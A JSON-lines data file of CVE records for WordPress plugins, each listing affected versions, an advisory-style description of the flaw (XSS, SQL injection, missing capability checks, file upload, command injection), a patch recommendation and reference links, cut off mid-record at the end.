{"CVE_ID":"CVE-2024-1809","slug":"wp-analytify","versionImpact":"5.2.3","versionEndExcluding":"5.2.4","description":"The Analytify \u2013 Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on AJAX functions in combination with nonce leakage in all versions up to, and including, 5.2.3. This makes it possible for authenticated attackers, with subscriber access and higher, to obtain certain sensitive information related to plugin settings.","recommendation":"Update to version 5.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a659071-df11-4318-86c2-7881163c8b62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a659071-df11-4318-86c2-7881163c8b62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072410%40wp-analytify%2Ftrunk&old=3024819%40wp-analytify%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072410%40wp-analytify%2Ftrunk&old=3024819%40wp-analytify%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1584","slug":"wp-analytify","versionImpact":"5.2.3","versionEndExcluding":"5.2.4","description":"The Analytify \u2013 Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpa_check_authentication' function in all versions up to, and including, 5.2.1. This makes it possible for unauthenticated attackers to modify the site's Google Analytics tracking ID.","recommendation":"Update to version 5.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c399c6a-d5e4-4b88-a0a9-003233d5d59f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c399c6a-d5e4-4b88-a0a9-003233d5d59f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072410%40wp-analytify&new=3072410%40wp-analytify&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072410%40wp-analytify&new=3072410%40wp-analytify&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4067","slug":"bus-ticket-booking-with-seat-reservation","versionEndExcluding":"5.2.4","description":"The Bus Ticket Booking with Seat Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab_date' and 'tab_date_r' parameters in versions up to, and including, 5.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff2855cb-e4a8-4412-af24-4cee03ae2d43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff2855cb-e4a8-4412-af24-4cee03ae2d43?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2945247%40bus-ticket-booking-with-seat-reservation&new=2945247%40bus-ticket-booking-with-seat-reservation&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2945247%40bus-ticket-booking-with-seat-reservation&new=2945247%40bus-ticket-booking-with-seat-reservation&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4022","slug":"mwp-herd-effect","versionEndExcluding":"5.2.3","description":"The Herd Effects WordPress plugin before 5.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ac0b19-58b1-4620-b3b7-fbe6dd6c8dd5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ac0b19-58b1-4620-b3b7-fbe6dd6c8dd5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"mwp-herd-effect","versionEndExcluding":"5.2.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12408","slug":"wp-migrate-2-aws","versionImpact":"5.2.1","versionEndExcluding":"5.2.2","description":"The WP on AWS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST data in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209870%40wp-migrate-2-aws&new=3209870%40wp-migrate-2-aws&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209870%40wp-migrate-2-aws&new=3209870%40wp-migrate-2-aws&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10793","slug":"wp-security-audit-log","versionImpact":"5.2.1","versionEndExcluding":"5.2.2","description":"The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.","recommendation":"Update to version 5.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f3b2e4-c537-4369-b2d6-39fbc6cb8e08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f3b2e4-c537-4369-b2d6-39fbc6cb8e08?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/tags\\\/5.2.1\\\/classes\\\/WPSensors\\\/class-wp-system-sensor.php#L679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/tags\\\/5.2.1\\\/classes\\\/WPSensors\\\/class-wp-system-sensor.php#L679\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13534","slug":"small-package-quotes-wwe-edition","versionImpact":"5.2.18","versionEndExcluding":"5.2.19","description":"The Small Package Quotes \u2013 Worldwide Express Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 5.2.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.2.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241919%40small-package-quotes-wwe-edition&new=3241919%40small-package-quotes-wwe-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241919%40small-package-quotes-wwe-edition&new=3241919%40small-package-quotes-wwe-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0235347-75ef-458e-97ec-bb9b00e1f9de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0235347-75ef-458e-97ec-bb9b00e1f9de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13333","slug":"file-manager-advanced","versionImpact":"5.2.13","versionEndExcluding":"5.2.14","description":"The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fma_local_file_system' function in versions 5.2.12 to 5.2.13. This makes it possible for authenticated attackers, with Subscriber-level access and above and upload permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. The function can be exploited only if the \"Display .htaccess?\" setting is enabled.","recommendation":"Update to version 5.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3200092#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3200092#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222740\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222740\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8bcbf8-1848-4f7a-89d8-5894de0bb18b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8bcbf8-1848-4f7a-89d8-5894de0bb18b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11391","slug":"file-manager-advanced","versionImpact":"5.2.10","versionEndExcluding":"5.2.11","description":"The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the 'class_fma_connector.php' file in all versions up to, and including, 5.2.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199242\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199242\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f14a658c-1517-4af4-8bd7-c379ac07ab35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f14a658c-1517-4af4-8bd7-c379ac07ab35?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2499","slug":"custom-registration-form-builder-with-submission-manager","versionEndExcluding":"5.2.1.1","description":"The RegistrationMagic plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.2.1.0. This is due to insufficient verification on the user being supplied during a Google social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.4\\\/services\\\/class_rm_user_services.php#L791\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.4\\\/services\\\/class_rm_user_services.php#L791\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87ec5542-b6e7-4b18-a3ec-c258e749d32e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87ec5542-b6e7-4b18-a3ec-c258e749d32e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912481%40custom-registration-form-builder-with-submission-manager&new=2912481%40custom-registration-form-builder-with-submission-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912481%40custom-registration-form-builder-with-submission-manager&new=2912481%40custom-registration-form-builder-with-submission-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2548","slug":"custom-registration-form-builder-with-submission-manager","versionEndExcluding":"5.2.1.0","description":"The RegistrationMagic plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 5.2.0.5. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers, with administrator-level permissions and above, to change user passwords and potentially take over super-administrator accounts in multisite setup.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfbc406b-49af-419e-adeb-0510794b7e3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfbc406b-49af-419e-adeb-0510794b7e3f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.5\\\/includes\\\/class_rm_utilities.php#L3044\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.5\\\/includes\\\/class_rm_utilities.php#L3044\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9651","slug":"fluentform","versionImpact":"5.2.0","versionEndExcluding":"5.2.1","description":"The Fluent Forms  WordPress plugin before 5.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2c56e42-3b3a-4e23-933f-40cf63e222c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2c56e42-3b3a-4e23-933f-40cf63e222c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6420","slug":"hide-my-wp","versionImpact":"5.2.01","versionEndExcluding":"5.2.02","description":"The Hide My WP Ghost  WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.","recommendation":"Update to version 5.2.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfda6577-81aa-4397-a2d6-1d736f9ebd44\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfda6577-81aa-4397-a2d6-1d736f9ebd44\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36699","slug":"quick-pagepost-redirect-plugin","versionEndExcluding":"5.2.0","description":"The Quick Page\/Post Redirect Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the qppr_save_quick_redirect_ajax and qppr_delete_quick_redirect functions in versions up to, and including, 5.1.9. This makes it possible for low-privileged attackers to interact with the plugin settings and to create a redirect link that would forward all traffic to an external malicious website.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/authenticated-settings-change-vulnerability-in-wordpress-quick-page-post-redirect-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/authenticated-settings-change-vulnerability-in-wordpress-quick-page-post-redirect-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-quick-page-post-redirect-security-bypass-5-1-9\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-quick-page-post-redirect-security-bypass-5-1-9\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11c4b855-8589-4ad2-b414-566ac8eb4632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11c4b855-8589-4ad2-b414-566ac8eb4632?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10198\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10198\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13415","slug":"tlp-food-menu","versionImpact":"5.1.4","versionEndExcluding":"5.2.0","description":"The Food Menu \u2013 Restaurant Menu & Online Ordering for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the response() function in all versions up to, and including, 5.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's settings.","recommendation":"Update to version 5.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-food-menu\\\/tags\\\/5.1.4\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-food-menu\\\/tags\\\/5.1.4\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231030%40tlp-food-menu&new=3231030%40tlp-food-menu&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231030%40tlp-food-menu&new=3231030%40tlp-food-menu&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab6dd645-8831-49bc-b6b1-bb153ef79204?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab6dd645-8831-49bc-b6b1-bb153ef79204?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3284","slug":"user-registration-pro","versionImpact":"5.1.3","versionEndExcluding":"5.2.0","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.1.3. This is due to missing or incorrect nonce validation on the user_registration_pro_delete_account() function. This makes it possible for unauthenticated attackers to force delete users, including administrators, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpuserregistration.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpuserregistration.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4616b609-e8dc-4004-a5b7-2de3e83719be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4616b609-e8dc-4004-a5b7-2de3e83719be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25224","slug":"wp-database-backup","versionEndExcluding":"5.2","description":"The WP Database Backup plugin for WordPress is vulnerable to OS Command Injection in versions before 5.2 via the mysqldump function. This vulnerability allows unauthenticated attackers to execute arbitrary commands on the host operating system.","recommendation":"Update to version 5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/06\\\/os-command-injection-in-wp-database-backup.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/06\\\/os-command-injection-in-wp-database-backup.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/153781\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/153781\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2078035\\\/wp-database-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2078035\\\/wp-database-backup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_db_backup_rce.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_db_backup_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/05\\\/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/05\\\/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21cf285-9d75-43a2-9e81-67116f0bf896?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21cf285-9d75-43a2-9e81-67116f0bf896?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1402","slug":"event-tickets","versionImpact":"5.19.1.1","versionEndExcluding":"5.19.1.2","description":"The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'ajax_ticket_delete' function in all versions up to, and including, 5.19.1.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary Attendee tickets.","recommendation":"Update to version 5.19.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Assets.php#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Assets.php#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordfence.freshdesk.com\\\/a\\\/tickets\\\/375051\",\"name\":\"https:\\\/\\\/wordfence.freshdesk.com\\\/a\\\/tickets\\\/375051\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbd838b6-7792-4378-8969-a70c6e16ff6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbd838b6-7792-4378-8969-a70c6e16ff6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13457","slug":"event-tickets","versionImpact":"5.18.1","versionEndExcluding":"5.18.1.1","description":"The Event Tickets and Registration plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.18.1 via the tc-order-id parameter due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view order details of orders they did not place, which includes ticket prices, user emails and order date.","recommendation":"Update to version 5.18.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229935%40event-tickets%2Ftags%2F5.18.1.1&old=3227011%40event-tickets%2Ftags%2F5.18.1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229935%40event-tickets%2Ftags%2F5.18.1.1&old=3227011%40event-tickets%2Ftags%2F5.18.1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cc2261a-889e-40ec-8382-48de65b91b34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cc2261a-889e-40ec-8382-48de65b91b34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0079","slug":"customer-reviews-woocommerce","versionImpact":"5.16.0","versionEndExcluding":"5.17.0","description":"The Customer Reviews for WooCommerce WordPress plugin before 5.17.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.17.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdaba4d1-950d-4512-95de-cd43fe9e73e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdaba4d1-950d-4512-95de-cd43fe9e73e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12421","slug":"woo-coupon-usage","versionImpact":"5.16.7.1","versionEndExcluding":"5.16.7.2","description":"The The Coupon Affiliates \u2013 Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.16.7.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. The Cross-Site Scripting was patched in version 5.16.7.1, while the arbitrary shortcode execution was patched in 5.16.7.2.","recommendation":"Update to version 5.16.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/5.16.7\\\/inc\\\/functions\\\/functions-user-coupons.php#L491\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/5.16.7\\\/inc\\\/functions\\\/functions-user-coupons.php#L491\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207070%40woo-coupon-usage&new=3207070%40woo-coupon-usage&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207070%40woo-coupon-usage&new=3207070%40woo-coupon-usage&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66b669ce-142a-48b8-9adf-620657c2db74?source=cve\",\"name\":\"https:\\\/\\\/www.